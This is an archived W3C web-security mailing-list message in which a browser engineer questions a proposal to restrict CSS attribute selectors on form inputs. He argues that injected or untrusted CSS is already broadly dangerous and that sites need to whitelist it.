- From: Maciej Stachowiak <mjs@apple.com>
- Date: Tue, 08 Dec 2009 10:54:29 -0800
- To: Maciej Stachowiak <mjs@apple.com>
- Cc: gaz Heyes <gazheyes@gmail.com>, Adam Barth <w3c@adambarth.com>, Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Dec 8, 2009, at 7:07 AM, Maciej Stachowiak wrote: > Another possibility is to specifically blacklist the use of the > contents of the "value" attribute in attribute selectors for > elements in the HTML namespace. Either all elements, or specifically > input elements, or more specifically input elements of type password > or hidden. > > I think that is better than making attribute selectors not work with > those elements at all. People validly use attribute selectors on > form controls based on the "type" attribute to style them. I'd like to backpedal from this proposal for a second so I can understand the issue better. Are we worried about: A) Sites that voluntarily include untrusted CSS (such as user- provided) without filtering being exposed to data theft risk. B) Sites that have inadvertent CSS injection risk (but without the possibility of script injection) being exposed to data theft risk. C) Both. One thing to keep in mind is that including untrusted CSS is already extremely risky. If the attacker can inject CSS (whether willingly or not) he or she can do the following: 1) Arbitrarily move around elements on the page. 2) Make any element invisible. 3) Replace the visible contents of elements with chosen images or text. 4) Overlay one element invisibly on top of another. Using these, you can make the "Delete Account" button look like a "Mail me a Free Pony" button. This isn't even counting features like - moz-binding or CSS expressions. Thus, any site doing voluntary injection of CSS must do whitelisting to be safe. Any site with inadvertent CSS injection holes is already at great risk. This I am not sure it is worth focusing on attribute selectors specifically as a CSS-based attack vector. Am I missing anything here? Regards, Maciej
Received on Tuesday, 8 December 2009 18:55:03 UTC